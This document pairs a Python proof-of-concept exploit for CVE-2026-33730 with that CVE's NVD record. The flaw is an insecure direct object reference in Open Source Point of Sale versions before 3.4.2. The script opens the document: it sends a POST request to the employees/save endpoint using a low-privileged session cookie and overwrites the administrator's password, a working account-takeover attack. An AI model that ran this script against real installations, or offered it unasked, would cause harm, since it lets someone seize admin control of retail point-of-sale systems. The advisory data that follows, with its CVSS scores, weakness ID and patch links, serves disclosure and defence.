CVE-2026-33730

import requests # Target URL configuration target_url = "http://target-opensourcepos.com/index.php/employees/save/1" # Attacker's session cookie (low-privileged user) session_cookie = "ci_session=attacker_session_value_here" # Headers headers = { "Cookie": session_cookie, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (PoC-Scanner)" } # Payload data # Note: 'employee_id' is usually a hidden field or part of the URL, # but here we simulate manipulating the data sent to the backend. payload_data = { "employee_id": "1", "username": "admin", "password": "newHackedPassword123!", "password_repeat": "newHackedPassword123!" } try: # Sending the request to reset the admin password (ID: 1) response = requests.post(target_url, data=payload_data, headers=headers) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check if the password for employee_id 1 (Admin) has been changed.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33730", "sourceIdentifier": "[email protected]", "published": "2026-03-27T01:16:20.577", "lastModified": "2026-04-01T15:05:18.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using CodeIgniter framework. Prior to version 3.4.2, an Insecure Direct Object Reference (IDOR) vulnerability allows an authenticated low-privileged user to access the password change functionality of other users, including administrators, by manipulating the `employee_id` parameter. The application does not verify object ownership or enforce authorization checks. Version 3.4.2 adds object-level authorization checks to validate that the current user owns the employee_id being accessed."}, {"lang": "es", "value": "Open Source Point of Sale (opensourcepos) es una aplicación de punto de venta basada en la web escrita en PHP utilizando el framework CodeIgniter. Antes de la versión 3.4.2, una vulnerabilidad de Referencia Directa Insegura a Objeto (IDOR) permite a un usuario autenticado con bajos privilegios acceder a la funcionalidad de cambio de contraseña de otros usuarios, incluidos los administradores, manipulando el parámetro 'employee_id'. La aplicación no verifica la propiedad del objeto ni aplica comprobaciones de autorización. La versión 3.4.2 añade comprobaciones de autorización a nivel de objeto para validar que el usuario actual es propietario del 'employee_id' al que se accede."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.2", "matchCriteriaId": "401D867E-4CA1-48F9-9C5D-492BCAAC8106"}]}]}], "references": [{"url": "https://github.com/opensourcepos/opensourcepos/commit/ee4d44ed396097d6010c5490ab4fd7cfae694624", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-mcc2-8rp2-q6ch", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}